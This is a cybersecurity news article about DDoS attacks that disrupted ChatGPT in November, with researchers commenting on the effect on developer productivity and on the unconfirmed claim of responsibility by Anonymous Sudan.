Generative AI, Network Security

DDoS attack on ChatGPT sparks concerns over coding, productivity disruptions

Share
ChatGPT chat bot

Security researchers expressed broad concern over news late in the day Nov. 8 that OpenAI confirmed it was “dealing with periodic outages” because of distributed-denial-of-service (DDoS) attacks on its ChatGPT services.

The security pros were generally concerned about disruptions in workflow for companies that use ChatGPT for coding and attempts by threat actors to launch more targeted attacks on customer networks.

This most recent outage comes on the heels of another ChatGPT outage that  took down its application programming interface (API) earlier on Wednesday, partial ChatGPT outages on Tuesday, and elevated error rates on it's text-to-image model Dall-E on Monday.

“The recent service interruptions of OpenAI's ChatGPT have presented challenges for developers, particularly those who rely on its APIs for coding-related tasks,” said Callie Guenther, senior manager, cyber threat research at Critical Start. “These outages have temporarily affected workflows, as developers are accustomed to using these tools for code completion, debugging, and learning new coding practices. Consequently, some projects may experience delays.”

Guenther added that productivity may also be impacted, given the role of AI in streamlining coding processes. Developers might find themselves spending more time on tasks typically accelerated by AI, such as generating code snippets or refining algorithms, said Guenther. For those who have incorporated OpenAI's services into their products, Guenther said the downtime may prompt a review of their current dependencies and an exploration of alternative options to bolster their systems against similar incidents in the future.

Patrick "Pat" Arvidson, chief strategist/evangelist at Interpres Security, called the recent DDoS attack on ChatGPT “extremely serious” as sophisticated hackers are known to use these types of attacks as obfuscation for more serious longer term plans. Arvidson said they count on the distraction to divert the SecOps team away from their true objective: place stealthy implants in the targeted network. 

“In the case of a GenAI, this could be anything from an attempt to poison the LLM [large language model] to provide bad and false information, to attempting to force the API into delivering information that the hacker wants to exploit,” said Arvidson. “For organizations that use the LLM, either as a business function or as part of a capability from a second party, they will need to validate any and all information submitted to, and received from the LLM. Further, all responses should be tested and evaluated for malicious software before it’s deployed. They should also verify with any cyber insurance coverage that they are covered from supply side attacks."

The plot thickens: are the Russians involved?

OpenAI has not yet attributed the DDoS attacks, but suspected Russian threat actor Anonymous Sudan claimed the attacks, posting on Telegram Wednesday that it targeted OpenAI and its ChatGPT services because of OpenAI’s sympathies with Israel.

In citing reasons for the attack, the threat groups said it was because of “OpenAI's cooperation with the occupation state of Israel and the CEO of OpenAI saying he's willing to invest into Israel more, and his several meetings with Israeli officials like Netanyahu, as Reuters reported."

The Telegram post goes on to say: “AI is now being used in the development of weapons and by intelligence agencies like Mossad, and Israel also employs AI to further oppress the Palestinians.”

Critical Start’s Guenther pointed out that the lack of attribution by OpenAI could stem from several reasons: it could be because of insufficient evidence to definitively attribute the attack to a particular actor, or OpenAI could have made a strategic decision to avoid giving undue attention to the attackers or encouraging further incidents.

“Attribution in cybersecurity is complex and challenging,” said Guenther. “Cyber attackers often use sophisticated techniques to conceal their identities and locations, making it difficult to pinpoint the true source of an attack. Moreover, even when an actor claims responsibility, verifying the authenticity of such claims requires careful analysis and often, substantial evidence that links the attack to the claimant’s capabilities and motives.”

Guenther added that the possibility of a publicity stunt by Anonymous Sudan cannot be entirely dismissed without concrete evidence. Groups may claim responsibility for various reasons, including drawing attention to their cause or demonstrating their capabilities to potential recruits or sympathizers.

“On the other hand, if the claim by Anonymous Sudan aligns with the technical evidence of the attack and their known capabilities, it might lend more credibility to their claim,” said Guenther. “Either way, without access to detailed forensic data and the ongoing investigation's insights, any analysis is purely speculative.”

DDoS attack on ChatGPT sparks concerns over coding, productivity disruptions

OpenAI reported multiple disruptions this week, culminating in a distributed-denial-of-service attack on ChatGPT on Nov. 8.

Get daily email updates

SC Media's daily must-read of the most current and pressing daily news

By clicking the Subscribe button below, you agree to SC Media Terms of Use and Privacy Policy.